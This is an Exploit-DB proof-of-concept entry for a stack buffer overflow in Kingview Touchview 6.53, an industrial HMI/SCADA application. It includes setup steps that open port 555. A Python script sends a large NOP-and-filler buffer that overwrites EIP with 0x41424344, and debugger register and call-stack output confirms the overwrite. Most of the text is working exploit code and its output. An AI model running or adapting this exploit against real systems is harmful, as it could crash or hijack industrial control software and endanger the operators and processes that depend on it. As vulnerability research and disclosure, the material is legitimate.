Kingview Touchview 6.53 – EIP Overwrite

  • 作者: Carlos Mario Penagos Hollmann
    日期: 2012-06-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19388/
  • # Exploit Title: Kingview TouchviewEIP direct control
    # Date: June 24 2012
    # Exploit Author: Carlos Mario Penagos Hollmann
    # Vendor Homepage: www.kingview.com
    
    # Version: 6.53
    # Tested on: Windows SP 1
    # CVE :
    
    Open kingivew click on Make choose network configuration--->network
    parameter , thengo to the node type and choose Local is a Login Server,
    run the demo port 555 will be open.
    NOTE:
    This was already patched by the vendor silently.
    
    import os
    import socket
    import sys
    
    host ="10.0.2.15"
    port = 555
    
    exploit = ("\x90"*1024)
    exploit += ("A"*23976)
    exploit += ("B"*12500)
    exploit += ("D"*6250)
    exploit += ("E"*6002)
    exploit += ("\x44\x43\x42\x41")
    exploit += ("\x90"*256)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    s.send(exploit)
    data = s.recv(1024)
    print "[+] Closing connection.."
    s.close()
    print "[+] Done!"
    
    
    eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344
    edi=0012f6b4
    eip=41424344 esp=0012f650 ebp=0012f678 iopl=0 nv up ei pl nz na po
    nc
    cs=001bss=0023ds=0023es=0023fs=003bgs=0000
    efl=00010202
    41424344 ??
    CALL TO STACK
    0x41424344
    USER32!GetDC+0x6d
    USER32!EnumDisplaySettingsA+0x27d
    USER32!EnumDisplaySettingsA+0xc9
    USER32!DefDlgProcA+0x22